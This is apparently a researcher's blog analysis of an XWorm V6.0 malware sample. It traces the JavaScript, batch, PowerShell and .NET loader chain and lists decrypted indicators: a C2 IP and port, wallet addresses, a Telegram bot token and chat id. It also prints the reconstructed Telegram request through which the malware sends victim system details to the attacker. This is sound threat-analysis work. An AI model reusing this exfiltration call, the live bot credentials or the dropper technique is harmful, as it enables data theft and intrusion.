What's XWorm?
"Malware with wide range of capabilities ranging from RAT to ransomware." -malpedia
Small Story
I will keep things simple as usual, I was checking out MalwareBazaar and a javascript file tagged as "XWorm" caught my eye, downloaded it to check out later (I had a competition so there was no time to check for a week), This is the MalwareBazaar link of the file. First seen in the wild at "2025-07-23 16:04:23 UTC".
NOTE: All Files are provided at the end of this page.
Simple Flow
None of these files were downloaded from external source. Most of them were extracted using Base64 decryption and AES decryption.
Analysis (Dropper, Evasion)
Extracting files were simple for me. It was like, instead of letting code execute things, I was writing the decoded bytes/scripts to the file and analyze them one-by-one.
Starting with the "javascript" file, it had only 1 purpose and it was extracting a "DallasBoulevard.bat" into "AppData/Local/Temp" and executing it.
This batch file had a few purposes, it was also obfuscated but I extracted the first thing it does, executing a "PowerShell" command, which this "PowerShell" command itself will also use the bat file (In different directory but same bat file) to get first line starting with ":::", Base64 decode it and execute it (Powershell command again).
This Powershell command is using advanced ways to avoid detection. Things it does:
Comments are added me as I was analysing script, strings were also encrypted so I had to decrypt them too.
After, powershell script is done executed, it looks for "::" line and seperates it to 2 different executable files. First executable .NET file is useless and does nothing, but the second one decrypts bytes and executes the "XWormClient.exe" (Which is the main malware file we were looking for).
This .NET executable is highly obfuscated, I used NetReactorSlayer to deobfuscate it, but honestly it couldn't do much. I might have done something wrong but it is what it is, I could get the things I need at the end.
XWormClient
PART 1: Decrypt Strings: (ALL STRINGS) Glass0.
- obf_str1 = 192.159.99.85
- obf_str2 = 6000
- obf_str3 = <666666>
- obf_str4 = <Xwormmm>
- obf_str5 = XWorm V6.0
- obf_str6 = USB.exe
- string2 = bc1qac0j3zkpqwudsezg63x37nmqv2tanpk2zys43c
- obf_str7 = 0x9e335947293636ADfC39A13825Cd04244Fd0c1a9
- obf_str8 = TWNsPN7sYpTSogGAnixsTDJnnPCViDQ45r
- obf_str9 = 7257315662:AAGE4uU4C2ntEMTG6_foXKQLLlTndz8MhuE
- obf_str10 = 440743435
PART 2: Create new Mutex with name: "6NW0cPlN6C2gZ2Tp"
PART 3: Application run and set in infinite loop
PART 4: Setup Network Connection (DefaultConnectionLimit etc. changed)
PART 5: (After WebClient object created)
obj3: "☠ [XWorm V6.0 @XCoderTools]\r\n\r\nNew CLient : \r\n41B3E62F549A81F56A43\r\n\r\nUserName : flare\r\nOSFullName : Microsoft Windows 10 Pro\r\nUSB : False\r\nCPU : 13th Gen Intel i7-13650HX\r\nGPU : Microsoft Remote Display Adapter Microsoft Basic Display Adapter \r\nRAM : 7.98 GB\r\nGroup : XWorm V6.0"
NOTE: This is my PC configuration (VM)
Then File is downloaded from: obj2 {string[0x00000006]} object {string[]} [0] "https://api.telegram.org/bot" [1] "7257315662:AAGE4uU4C2ntEMTG6_foXKQLLlTndz8MhuE" [2] "/sendMessage?chat_id=" [3] "440743435" [4] "&text=" [5] "☠ [XWorm V6.0 @XCoderTools]\r\n\r\nNew CLient : \r\n41B3E62F549A81F56A43\r\n\r\nUserName : flare\r\nOSFullName : Microsoft Windows 10 Pro\r\nUSB : False\r\nCPU : 13th Gen Intel i7-13650HX\r\nGPU : Microsoft Remote Display Adapter Microsoft Basic Display Adapter \r\nRAM : 7.98 GB\r\nGroup : XWorm V6.0"
returned: @"{""ok"":true,""result"":{""message_id"":1132,""from"":{""id"":7257315662,""is_bot"":true,""first_name"":""VIRUS \ud83e\udda0 BOTS"",""username"":""Alvin0365bot""},""chat"":{""id"":440743435,""first_name"":""Alvinmullar"",""username"":""alvinmullar"",""type"":""private""},""date"":1753785840,""text"":""\u2620 [XWorm V6.0 @XCoderTools]\n\nNew CLient : \n41B3E62F549A81F56A43\n\nUserName : flare\nOSFullName : Microsoft Windows 10 Pro\nUSB : False\nCPU : 13th Gen Intel i7-13650HX\nGPU : Microsoft Remote Display Adapter Microsoft Basic Display Adapter \nRAM : 7.98 GB\nGroup : XWorm V6.0"",""entities"":[{""offset"":14,""length"":12,""type"":""mention""}]}}"
after that ,webclient is disposed.
Result?
What we get is, this telegram bot is used as C2 and "192.159.99.85:6000" is (probably, not sure) used for remote connection. I didn't go deeper but I uploaded all these files in to MalwareBazaar for anyone that needs to check it out. These all are new file and XWormClient version is "6.0" (latest).